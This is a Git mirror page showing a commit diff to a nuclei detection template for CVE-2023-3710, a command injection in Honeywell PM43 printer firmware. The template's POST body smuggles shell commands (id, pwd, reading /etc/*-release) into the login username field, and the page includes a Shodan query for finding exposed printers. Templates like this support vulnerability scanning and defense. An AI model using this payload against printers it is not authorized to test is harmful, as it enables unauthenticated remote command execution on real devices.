daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor update

patch-1
Dhiyaneshwaran 2023-10-16 10:40:56 +05:30 committed by GitHub
parent 3781881f10
commit 0b2573f839
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
http/cves/2023/CVE-2023-3710.yaml
View File

@ -3,15 +3,26 @@ id: CVE-2023-3710
info:
name: Honeywell PM43 Printers - Command Injection
author: win3zz
severity: Critical
severity: critical
description: |
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection. This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
reference:
- https://www.cve.org/CVERecord?id=CVE-2023-3710
- https://nvd.nist.gov/vuln/detail/CVE-2023-3710
- https://github.com/vpxuser/CVE-2023-3710-POC
- https://twitter.com/win3zz/status/1713451282344853634
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3710
cwe-id: CWE-20,CWE-77
epss-score: 0.00084
epss-percentile: 0.34979
cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
metadata:
shodan-query: http.html:"/main/login.lua?pageid="
tags: cve, commandinjection, honeywell, pm43printers
verified: true
max-request: 1
tags: cve,cve2023,honeywell,pm43,printer,iot,rce
http:
- method: POST
@ -20,9 +31,20 @@ http:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=x%0aecho+'Inj3cti0n_D3t3ct3d'%0a&userpassword=1
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
- type: word
part: body
words:
- 'Inj3cti0n_D3t3ct3d'
- 'Release date'
- type: status
status:
- 200